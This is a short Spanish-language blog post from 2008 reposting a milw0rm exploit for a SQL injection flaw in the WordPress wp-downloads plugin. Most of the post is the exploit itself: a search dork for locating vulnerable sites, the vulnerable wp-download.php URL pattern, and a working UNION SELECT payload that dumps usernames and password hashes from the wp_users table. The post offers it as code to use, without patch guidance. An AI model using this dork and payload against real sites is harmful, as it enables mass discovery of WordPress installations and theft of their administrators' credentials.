vulnerabilidad en un plugin de wordpress
Abril 1, 2008 12:12 am noticias
hoy mediante el blog de mi amigo neri
me informe sobre una vulnerabilidad que afecta un plugin de wordpress el cual se llama wp-downloads
el plugin es vbulnerable a una inyeccion SQL.
el exploit fue subido a milw0rm aca les dejo el codigo
url: http://milw0rm.com/exploits/5326 ############################################################### # # Wordpress Plugin Download file Remote SQL Injection Vulnerability # ############################################################### # # Author: BL4CK # # Mail: bl4ck00@gmail.com # ################################################################ # # Dork: inurl:"wp-download.php?dl_id=" # ################################################################ Example: http://localhost/[path]/[path]/[path]/wp-download.php?dl_id=[SQL] SQL: null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/* ################################################################ # Greetz: ZioN, b!g B0$$, h4cky0u.org ################################################################ # milw0rm.com [2008-03-31]
